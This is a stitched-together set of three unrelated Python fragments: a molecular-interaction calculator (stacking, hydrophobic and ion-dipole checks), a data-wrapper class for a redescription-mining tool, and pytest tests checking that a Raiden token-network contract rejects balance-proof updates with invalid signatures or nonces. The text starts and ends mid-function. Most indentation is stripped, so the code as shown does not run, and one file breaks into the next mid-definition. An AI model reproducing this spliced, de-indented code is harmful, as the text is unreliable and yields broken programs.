disp_angle = im.to_quad1(im.angle(ring_grp.normal, cc_vect))
if (self.is_within_boundary(dihedral_angle, "max_dihed_ang_amide_pi_inter", le)
and self.is_within_boundary(disp_angle, "max_disp_ang_pi_pi_inter", le)):
params = {"cc_dist_amide_pi_inter": cc_dist,
"dihed_ang_amide_pi_inter": dihedral_angle,
"disp_ang_amide_pi_inter": disp_angle}
inter = InteractionType(group1, group2, "Amide-aromatic stacking", params=params)
interactions.append(inter)
return interactions
@staticmethod
def calc_hydrop(self, params):
"""Default method to calculate hydrophobic interactons.
Parameters
----------
params : tuple of (:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.features.ChemicalFeature`,\
:class:`~luna.mol.features.ChemicalFeature`)
The tuple follows the order (:math:`A`, :math:`B`, :math:`A_f`, :math:`B_f`), where
:math:`A` and :math:`B` are two :class:`~luna.mol.groups.AtomGroup` objects, and
:math:`A_f` and :math:`B_f` are their features (:class:`~luna.mol.features.ChemicalFeature` objects), respectively.
Returns
-------
: list
"""
if not self.add_non_cov:
return []
group1, group2, feat1, feat2 = params
interactions = []
if ((feat1.name != "Hydrophobic" and feat1.name != "Hydrophobe")
or (feat2.name != "Hydrophobic" and feat2.name != "Hydrophobe")):
            logger.warning("Hydrophobic interactions require hydrophobic atoms or hydrophobes (group of hydrophobic atoms). "
                           "However, the provided groups have the features %s and %s." % (group1.feature_names, group2.feature_names))
return []
# Check if the interaction involves the same compound. For these cases, we ignore hydrophobic interactions.
if self._is_intramol_inter(group1, group2):
return []
# Verify if the groups contain the required number of atoms to form a valid surface.
if (not self.is_within_boundary(len(group1.atoms), "min_surf_size", ge)
or not self.is_within_boundary(len(group2.atoms), "min_surf_size", ge)):
return []
interacting_atms_in_surf1 = set()
interacting_atms_in_surf2 = set()
min_cc_dist = float('Inf')
for atm1, atm2 in product(group1.atoms, group2.atoms):
cc_dist = atm1 - atm2
if self.is_within_boundary(cc_dist, "max_dist_hydrop_inter", le):
interacting_atms_in_surf1.add(atm1)
interacting_atms_in_surf2.add(atm2)
if cc_dist < min_cc_dist:
min_cc_dist = cc_dist
        # Verify that the number of interacting atoms meets the required number of interacting atoms per surface.
if (not self.is_within_boundary(len(interacting_atms_in_surf1), "min_inter_atom_in_surf", ge)
or not self.is_within_boundary(len(interacting_atms_in_surf2), "min_inter_atom_in_surf", ge)):
return []
if (self.is_within_boundary(min_cc_dist, "boundary_cutoff", le)
and self.is_within_boundary(min_cc_dist, "max_dist_hydrop_inter", le)):
params = {"dist_hydrop_inter": min_cc_dist}
inter = InteractionType(group1, group2, "Hydrophobic", params=params)
interactions.append(inter)
return interactions
@staticmethod
def calc_ion_multipole(self, params):
"""Default method to calculate favorable and unfavorable ion-dipole interactions.
Parameters
----------
params : tuple of (:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.features.ChemicalFeature`,\
:class:`~luna.mol.features.ChemicalFeature`)
The tuple follows the order (:math:`A`, :math:`B`, :math:`A_f`, :math:`B_f`), where
:math:`A` and :math:`B` are two :class:`~luna.mol.groups.AtomGroup` objects, and
:math:`A_f` and :math:`B_f` are their features (:class:`~luna.mol.features.ChemicalFeature` objects), respectively.
Returns
-------
: list
"""
if not self.add_non_cov:
return []
group1, group2, feat1, | |
# Repository: zliobaite/teeth-redescription
import os.path
import collections
import sys
import re
import pdb
from ..reremi.classRedescription import Redescription, printTexRedList, printRedList, parseRedList
from ..reremi.classData import Data, DataError
from ..reremi.classQuery import Query
from ..reremi.toolICList import ICList
from ..reremi.toolICDict import ICDict
from ..reremi.toolLog import Log
from ..reremi.classBatch import Batch
from ..reremi.classPreferencesManager import PreferencesManager, PreferencesReader
from ..reremi import toolRead
from ..reremi.classPackage import Package, writePreferences, writeRedescriptions
#from findFiles import findFile
def findFile(fname, path=[]):
"""Finds file from path (always including the current working directory) and returns
its path or 'None' if the file does not exist.
If path is not given or an empty list, only checks if the file is present locally.
    On Windows, this also changes forward slashes to backward slashes in the path."""
if os.path.exists(fname):
return fname
for p in path:
testpath = os.path.join(os.path.normpath(p), fname)
if os.path.exists(testpath):
return testpath
return None
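# Usage sketch (file name and search paths are illustrative assumptions):
#
#   found = findFile("preferences.xml", ["conf", os.path.expanduser("~")])
#   if found is not None:
#       print("found at:", found)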
class DataWrapper(object):
"""Contains all the data
"""
def __init__(self, logger=None, package_filename = None, conf_defs=[]):
"""Inits the class. Either package_filename or the others should be given.
"""
#### [[idi, 1] for idi in range(len(self.data))]
if logger is None:
self.logger = Log()
else:
self.logger = logger
self.pm = PreferencesManager(conf_defs)
self.data = None
self.polys = None
self.pdp = None
self.resetRedescriptions()
self.preferences = ICDict(self.pm.getDefaultTriplets())
self.package = None
self._isChanged = False
self._isFromPackage = False
# (possible) function pointers to tell we've started and stopped reading
# If these are not None, they have to be triples (fnc, *args, **kwargs)
# See: self.registerStartReadingFileCallback and self.registerStopReadingFileCallback
self.startReadingFileCallback = None
self.stopReadingFileCallback = None
if package_filename is not None:
self.openPackage(package_filename)
def resetRedescriptions(self, reds=[]):
self.reds = Batch(reds)
self.rshowids = ICList(range(len(reds)), True)
def getColNames(self):
if self.data is not None:
return self.data.getNames()
return [[],[]]
def dataHasMissing(self):
if self.data is not None:
return self.data.hasMissing()
return False
def getNbRows(self):
if self.data is not None:
return self.data.nbRows()
return 0
def getDataCols(self, side):
if self.data is not None:
return self.data.cols[side]
return []
def getDataRows(self):
if self.data is not None:
return self.data.getRows()
return []
def getData(self):
return self.data
def isGeospatial(self):
if self.data is not None and self.data.isGeospatial():
return True
else:
return False
def getCoords(self):
if self.data is not None and self.data.isGeospatial():
return self.data.coords
def getCoordsExtrema(self):
if self.data is not None and self.data.isGeospatial():
return self.data.getCoordsExtrema()
return None
def getReds(self):
if self.reds is not None:
return self.reds
return []
def getNbReds(self):
if self.reds is not None:
return len(self.reds)
return 0
def getShowIds(self):
if self.rshowids is not None:
return self.rshowids
return []
def getPreferencesManager(self):
return self.pm
def getPreferences(self):
return self.preferences
def getPreference(self, param_id):
if self.preferences is not None and param_id in self.preferences:
return self.preferences[param_id]["data"]
else:
return False
def registerStartReadingFileCallback(self, fnc, *args, **kwargs):
"""Registers the function DataWrapper calls when it starts to read a file (to tell that it
starts reading the file). Parameters: fnc, [*args,] [**kwargs],
where fnc is a function with prototype
fnc(msg, [short_msg], [*args], [**kwargs])"""
self.startReadingFileCallback = (fnc, args, kwargs)
def registerStopReadingFileCallback(self, fnc, *args, **kwargs):
"""Registers the function DataWrapper calls when it stops reading a file.
Parameters: fnc, [*args,] [**kwargs],
where fnc is a function with prototype
fnc([msg], [*args], [**kwargs])"""
self.stopReadingFileCallback = (fnc, args, kwargs)
def __str__(self):
return "coords = " + str(self.getCoords()) + "; " \
+ "data = " + str(self.data) + "; " \
+ "#reds = " + str(len(self.reds)) + "; " \
+ "rshowids = " + str(self.rshowids) + "; " \
+ "preferences = " + str(self.preferences) + "; " \
+ "package_name = " + str(self.package_name) + "; " \
+ "isChanged = " + str(self.isChanged) + "; " \
+ "isFromPackage = " + str(self.isFromPackage)
## Setters
@property
def isChanged(self):
"""The property tracking if dw (incl. reds and rshowids) has changed"""
isChanged = self._isChanged
if self.reds is not None:
isChanged |= self.reds.isChanged
if self.rshowids is not None:
isChanged |= self.rshowids.isChanged
if self.preferences is not None:
isChanged |= self.preferences.isChanged
return isChanged
@isChanged.setter
def isChanged(self, value):
if isinstance(value, bool):
if value is False:
if self.reds is not None:
self.reds.isChanged = value
if self.rshowids is not None:
self.rshowids.isChanged = value
if self.preferences is not None:
self.preferences.isChanged = value
self._isChanged = value
else:
raise TypeError("The isChanged property accepts only Boolean attributes")
#isChanged = property(_get_isChanged, _set_isChanged)
@property
def isFromPackage(self):
"""The property tracking if dw was loaded from a package"""
return self._isFromPackage
@isFromPackage.setter
def isFromPackage(self, value):
if isinstance(value, bool):
self._isFromPackage = value
else:
raise TypeError("The isFromPackage property accepts only Boolean attributes")
def updatePreferencesDict(self, params):
#if type(params) == dict:
if isinstance(params, collections.MutableMapping):
self.preferences.update(params)
self.resetSSetts()
#self.isChanged = True
def setData(self, data):
self.data = data
self.resetSSetts()
def resetSSetts(self):
if self.getData() is not None:
if self.getData().hasMissing() is False:
parts_type = "grounded"
else:
parts_type = self.preferences.get("parts_type", {"data": None})["data"]
pval_meth = self.preferences.get("method_pval", {"data": None})["data"]
self.getData().getSSetts().reset(parts_type, pval_meth)
################################################################
def loadRedescriptionsFromFile(self, redescriptions_filename):
"""Loads new redescriptions from file"""
tmp_reds, tmp_rshowids = (None, None)
self._startMessage('importing', redescriptions_filename)
try:
tmp_reds, tmp_rshowids = self._readRedescriptionsFromFile(redescriptions_filename)
except IOError as arg:
self.logger.printL(1,"Cannot open: %s" % arg, "dw_error", "DW")
self._stopMessage()
raise
except Exception:
self.logger.printL(1,"Unexpected error while importing redescriptions from file %s!\n%s" % (redescriptions_filename, sys.exc_info()[1]), "dw_error", "DW")
self._stopMessage()
raise
finally:
self._stopMessage('importing')
return tmp_reds, tmp_rshowids
#################### IMPORTS
def importDataFromCSVFiles(self, data_filenames):
fnames = list(data_filenames[:2])
self._startMessage('importing', fnames)
try:
tmp_data = self._readDataFromCSVFiles(data_filenames)
except DataError as details:
self.logger.printL(1,"Problem reading files.\n%s" % details, "dw_error", "DW")
self._stopMessage()
raise
except IOError as arg:
self.logger.printL(1,"Cannot open: %s" % arg, "dw_error", "DW")
self._stopMessage()
raise
except Exception:
self.logger.printL(1,"Unexpected error while importing data from CSV files!\n%s" % sys.exc_info()[1], "dw_error", "DW")
self._stopMessage()
raise
else:
self.setData(tmp_data)
self.resetRedescriptions()
self._isChanged = True
self._isFromPackage = False
finally:
self._stopMessage('importing')
def importRedescriptionsFromFile(self, redescriptions_filename):
"""Loads new redescriptions from file"""
self._startMessage('importing', redescriptions_filename)
try:
tmp_reds, tmp_rshowids = self._readRedescriptionsFromFile(redescriptions_filename)
except IOError as arg:
self.logger.printL(1,"Cannot open: %s" % arg, "dw_error", "DW")
self._stopMessage()
raise
except Exception:
self.logger.printL(1,"Unexpected error while importing redescriptions from file %s!\n%s" % (redescriptions_filename, sys.exc_info()[1]), "dw_error", "DW")
self._stopMessage()
raise
else:
self.reds = tmp_reds
self.rshowids = tmp_rshowids
finally:
self._stopMessage('importing')
def importPreferencesFromFile(self, preferences_filename):
"""Imports mining preferences from file"""
self._startMessage('importing', preferences_filename)
try:
tmp_preferences = self._readPreferencesFromFile(preferences_filename)
except IOError as arg:
self.logger.printL(1,"Cannot open: %s" % arg, "dw_error", "DW")
self._stopMessage()
raise
except Exception:
self.logger.printL(1,"Unexpected error while importing preferences from file %s!\n%s" % (preferences_filename, sys.exc_info()[1]), "dw_error", "DW")
self._stopMessage()
raise
else:
self.preferences = tmp_preferences
self.preferences.isChanged = True
finally:
self._stopMessage('importing')
def openPackage(self, package_filename):
"""Loads new data from a package"""
self._startMessage('loading', [package_filename])
try:
self._readPackageFromFile(package_filename)
except DataError as details:
self.logger.printL(1,"Problem reading files.\n%s" % details, "dw_error", "DW")
self._stopMessage()
raise
except IOError as arg:
self.logger.printL(1,"Cannot open: %s" % arg, "dw_error", "DW")
self._stopMessage()
raise
except Exception:
self.logger.printL(1,"Unexpected error while importing package from file %s!\n%s" % (package_filename, sys.exc_info()[1]), "dw_error", "DW")
self._stopMessage()
raise
finally:
self._stopMessage('loading')
######################## READS
def _readDataFromCSVFiles(self, data_filenames):
try:
data = Data(data_filenames, "csv")
except Exception:
self._stopMessage()
raise
return data
def _readRedescriptionsFromFile(self, filename, data=None):
if data is None:
if self.data is None:
self._stopMessage()
raise Exception("Cannot load redescriptions if data is not loaded")
else:
data = self.data
reds = Batch([])
show_ids = None
        with open(filename, mode='r') as filep:
            parseRedList(filep, data, reds)
rshowids = ICList(range(len(reds)), True)
return reds, rshowids
def _readPreferencesFromFile(self, filename):
        with open(filename, mode='r') as filep:
            return ICDict(PreferencesReader(self.pm).getParameters(filep))
def _readPackageFromFile(self, filename):
package = Package(filename, self._stopMessage)
elements_read = package.read(self.pm)
self.package_name = package.getPackagename()
if elements_read.get("data") is not None:
self.setData(elements_read.get("data"))
else:
self.data = None
if elements_read.get("reds") is not None:
self.reds = Batch(elements_read.get("reds"))
self.rshowids = ICList(elements_read.get("rshowids"), False)
else:
self.reds = Batch([])
self.rshowids = ICList([], False)
if elements_read.get("preferences"):
self.preferences = ICDict(elements_read.get("preferences"))
else:
self.preferences = self.pm.getDefaultTriplets()
self.package = package
self._isChanged = False
self._isFromPackage = True
## print "Done Loading"
def prepareContentPackage(self):
contents = {}
if self.data is not None:
contents['data'] = self.data
if self.reds is not None and len(self.reds) > 0:
contents['redescriptions'] = self.reds
contents['rshowids'] = self.rshowids
if self.preferences is not None:
contents['preferences'] = self.preferences
contents['pm'] = self.pm
return contents
def savePackageToFile(self, filename, suffix=Package.DEFAULT_EXT):
try:
if self.package is None:
self.package = Package(None, self._stopMessage, mode="w")
self._writePackageToFile(filename, suffix)
except DataError as details:
self.logger.printL(1,"Problem writing package.\n%s" % details, "dw_error", "DW")
self._stopMessage()
raise
except IOError as arg:
self.logger.printL(1,"Cannot open file for package %s" % filename, "dw_error", "DW")
self._stopMessage()
raise
except Exception:
self.logger.printL(1,"Unexpected error while writing package!\n%s" % sys.exc_info()[1], "dw_error", "DW")
self._stopMessage()
raise
## The saving function
def _writePackageToFile(self, filename, suffix=Package.DEFAULT_EXT):
"""Saves all information to a new file"""
from collections import namedtuple
import pytest
from eth_tester.exceptions import TransactionFailed
from raiden_contracts.constants import (
EVENT_CHANNEL_BALANCE_PROOF_UPDATED,
CHANNEL_STATE_OPENED,
CHANNEL_STATE_NONEXISTENT,
TEST_SETTLE_TIMEOUT_MIN,
)
from raiden_contracts.utils.events import check_transfer_updated
from .fixtures.config import fake_bytes, EMPTY_ADDRESS
def test_update_call(
get_accounts,
token_network,
create_channel,
channel_deposit,
create_balance_proof,
create_balance_proof_update_signature,
):
(A, B, C) = get_accounts(3)
channel_identifier = create_channel(A, B)[0]
channel_deposit(A, 15, B)
token_network.functions.closeChannel(
B,
fake_bytes(32),
0,
fake_bytes(32),
fake_bytes(64),
).transact({'from': A})
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
(balance_hash, nonce, additional_hash, closing_signature) = balance_proof_A
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
EMPTY_ADDRESS,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': C})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
EMPTY_ADDRESS,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': C})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
fake_bytes(64),
).transact({'from': C})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
fake_bytes(32),
nonce,
additional_hash,
closing_signature,
balance_proof_update_signature_B,
).transact({'from': C})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
balance_hash,
0,
additional_hash,
closing_signature,
balance_proof_update_signature_B,
).transact({'from': C})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
balance_hash,
nonce,
additional_hash,
fake_bytes(64),
balance_proof_update_signature_B,
).transact({'from': C})
def test_update_nonexistent_fail(
get_accounts,
token_network,
create_balance_proof,
create_balance_proof_update_signature,
):
(A, B, C) = get_accounts(3)
(_, settle_block_number, state) = token_network.functions.getChannelInfo(A, B).call()
assert settle_block_number == 0
assert state == CHANNEL_STATE_NONEXISTENT
channel_identifier = token_network.functions.getChannelIdentifier(A, B).call()
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': C})
def test_update_notclosed_fail(
get_accounts,
token_network,
create_channel,
channel_deposit,
create_balance_proof,
create_balance_proof_update_signature,
):
(A, B, C) = get_accounts(3)
channel_identifier = create_channel(A, B)[0]
channel_deposit(A, 25, B)
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
(_, settle_block_number, state) = token_network.functions.getChannelInfo(A, B).call()
assert settle_block_number > 0
assert state == CHANNEL_STATE_OPENED
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': C})
def test_update_wrong_nonce_fail(
token_network,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
updateBalanceProof_state_tests,
):
(A, B, Delegate) = get_accounts(3)
settle_timeout = 6
deposit_A = 20
channel_identifier = create_channel(A, B, settle_timeout)[0]
channel_deposit(A, deposit_A, B)
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_B = create_balance_proof(channel_identifier, B, 5, 0, 3, fake_bytes(32, '02'))
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
txn_hash1 = token_network.functions.closeChannel(B, *balance_proof_B).transact({'from': A})
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': Delegate})
balance_proof_A_same_nonce = balance_proof_A
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A_same_nonce,
balance_proof_update_signature_B,
).transact({'from': Delegate})
balance_proof_A_lower_nonce = create_balance_proof(
channel_identifier,
A,
10,
0,
4,
fake_bytes(32, '02'),
)
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A_lower_nonce,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A_lower_nonce,
balance_proof_update_signature_B,
).transact({'from': A})
updateBalanceProof_state_tests(
A, balance_proof_A,
B, balance_proof_B,
settle_timeout,
txn_hash1,
)
def test_update_wrong_signatures(
token_network,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
):
(A, B, C) = get_accounts(3)
channel_identifier = create_channel(A, B)[0]
channel_deposit(A, 25, B)
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_A_fake = create_balance_proof(
channel_identifier,
A,
10,
0,
5,
fake_bytes(32, '02'),
signer=C,
)
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
balance_proof_update_signature_B_fake = create_balance_proof_update_signature(
C,
channel_identifier,
*balance_proof_A,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A_fake,
balance_proof_update_signature_B,
).transact({'from': C})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B_fake,
).transact({'from': C})
def test_update_channel_state(
token_network,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
updateBalanceProof_state_tests,
):
(A, B, Delegate) = get_accounts(3)
settle_timeout = 6
deposit_A = 20
channel_identifier = create_channel(A, B, settle_timeout)[0]
channel_deposit(A, deposit_A, B)
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_B = create_balance_proof(channel_identifier, B, 5, 0, 3, fake_bytes(32, '02'))
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
txn_hash1 = token_network.functions.closeChannel(B, *balance_proof_B).transact({'from': A})
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': Delegate})
updateBalanceProof_state_tests(
A, balance_proof_A,
B, balance_proof_B,
settle_timeout,
txn_hash1,
)
def test_update_channel_fail_no_offchain_transfers(
get_accounts,
token_network,
create_channel,
create_balance_proof,
create_balance_proof_update_signature,
):
(A, B) = get_accounts(2)
channel_identifier = create_channel(A, B)[0]
balance_proof_A = create_balance_proof(channel_identifier, A, 0, 0, 0)
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
token_network.functions.closeChannel(
B,
fake_bytes(32),
0,
fake_bytes(32),
fake_bytes(64),
).transact({'from': A})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
fake_bytes(32),
0,
fake_bytes(32),
fake_bytes(64),
fake_bytes(64),
).transact({'from': B})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': B})
def test_update_not_allowed_after_settlement_period(
token_network,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
web3,
):
""" updateNonClosingBalanceProof cannot be called after the settlement period. """
(A, B) = get_accounts(2)
settle_timeout = TEST_SETTLE_TIMEOUT_MIN
deposit_A = 20
channel_identifier = create_channel(A, B, settle_timeout)[0]
channel_deposit(A, deposit_A, B)
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_B = create_balance_proof(channel_identifier, B, 5, 0, 3, fake_bytes(32, '02'))
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
token_network.functions.closeChannel(B, *balance_proof_B).transact({'from': A})
web3.testing.mine(settle_timeout)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': A})
def test_update_not_allowed_for_the_closing_address(
token_network,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
):
""" Closing address cannot call updateNonClosingBalanceProof. """
(A, B, M) = get_accounts(3)
settle_timeout = TEST_SETTLE_TIMEOUT_MIN
deposit_A = 20
channel_identifier = create_channel(A, B, settle_timeout)[0]
channel_deposit(A, deposit_A, B)
# Some balance proof from B
balance_proof_B_0 = create_balance_proof(channel_identifier, B, 5, 0, 3, fake_bytes(32, '02'))
# Later balance proof, higher transferred amount, higher nonce
balance_proof_B_1 = create_balance_proof(channel_identifier, B, 10, 0, 4, fake_bytes(32, '02'))
# B's signature on the update message is valid
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_B_1,
)
# A closes with the first balance proof
token_network.functions.closeChannel(B, *balance_proof_B_0).transact({'from': A})
# Someone wants to update with later balance proof - not possible
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_B_1,
balance_proof_update_signature_B,
).transact({'from': A})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_B_1,
balance_proof_update_signature_B,
).transact({'from': B})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_B_1,
balance_proof_update_signature_B,
).transact({'from': M})
def test_updateNonClosingBalanceProof_invalid_BP_arguments(
token_network,
token_network_test,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
):
(A, B, C) = get_accounts(3)
settle_timeout = TEST_SETTLE_TIMEOUT_MIN
deposit_A = 20
channel_identifier = create_channel(A, B, settle_timeout)[0]
channel_deposit(A, deposit_A, B)
token_network.functions.closeChannel(
B,
fake_bytes(32),
0,
fake_bytes(32),
fake_bytes(64),
).transact({'from': A})
balance_proof = namedtuple(
'balance_proof',
['balance_hash', 'nonce', 'additional_hash', 'signature'],
)
# Create valid balance_proof
balance_proof_valid = balance_proof(*create_balance_proof(
channel_identifier,
A,
10,
0,
2,
fake_bytes(32, '02'),
))
# And a valid nonclosing_signature
valid_balance_proof_update_signature = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_valid,
)
# We test invalid balance proof arguments with valid signatures
# Create balance_proof for invalid token_network
balance_proof_invalid_token_network = balance_proof(*create_balance_proof(
channel_identifier,
A,
10,
0,
2,
fake_bytes(32, '02'),
other_token_network=token_network_test,
))
signature_invalid_token_network = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
other_token_network=token_network_test,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_invalid_token_network,
signature_invalid_token_network,
).transact({'from': B})
# Create balance_proof for invalid channel participant
balance_proof_invalid_channel_participant = balance_proof(*create_balance_proof(
channel_identifier,
C,
10,
0,
2,
fake_bytes(32, '02'),
))
signature_invalid_channel_participant = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_invalid_channel_participant,
signature_invalid_channel_participant,
).transact({'from': B})
# Create balance_proof for invalid channel identifier
balance_proof_invalid_channel_identifier = balance_proof(*create_balance_proof(
channel_identifier[::-1],
A,
10,
0,
2,
fake_bytes(32, '02'),
))
signature_invalid_channel_identifier = create_balance_proof_update_signature(
B,
channel_identifier[::-1],
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_invalid_channel_identifier,
signature_invalid_channel_identifier,
).transact({'from': B})
signature_invalid_balance_hash = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash[::-1],
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
balance_proof_valid.balance_hash[::-1], # invalid balance_hash
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
signature_invalid_balance_hash,
).transact({'from': B})
signature_invalid_nonce = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
1,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
balance_proof_valid.balance_hash,
1, # invalid nonce
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
signature_invalid_nonce,
).transact({'from': B})
signature_invalid_additional_hash = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash[::-1],
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
fake_bytes(32, '02'), # invalid additional_hash
balance_proof_valid.signature,
signature_invalid_additional_hash,
).transact({'from': B})
signature_invalid_closing_signature = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature[::-1],
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
signature_invalid_closing_signature[::-1], # invalid non-closing signature
).transact({'from': B})
# Call with same balance_proof and signature on valid arguments still works
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
valid_balance_proof_update_signature,
).transact({'from': B})
def test_updateNonClosingBalanceProof_signature_on_invalid_arguments(
token_network,
token_network_test,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
):
""" Call updateNonClosingBalanceProof with signature on invalid argument fails. """
(A, B, C) = get_accounts(3)
settle_timeout = TEST_SETTLE_TIMEOUT_MIN
deposit_A = 20
channel_identifier = create_channel(A, B, settle_timeout)[0]
channel_deposit(A, deposit_A, B)
balance_proof = namedtuple(
'balance_proof',
['balance_hash', 'nonce', 'additional_hash', 'signature'],
)
# Close channel
token_network.functions.closeChannel(
B,
fake_bytes(32),
0,
fake_bytes(32),
fake_bytes(64),
).transact({'from': A})
# Create valid balance_proof
balance_proof_valid = balance_proof(*create_balance_proof(
channel_identifier,
A,
10,
0,
2,
fake_bytes(32, '02'),
fake_bytes(32, '02'),
))
signature_invalid_token_network_address = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_valid,
other_token_network=token_network_test, # invalid token_network_address
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
signature_invalid_token_network_address,
).transact({'from': B})
signature_invalid_participant = create_balance_proof_update_signature(
C, # invalid signer
channel_identifier,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
signature_invalid_participant,
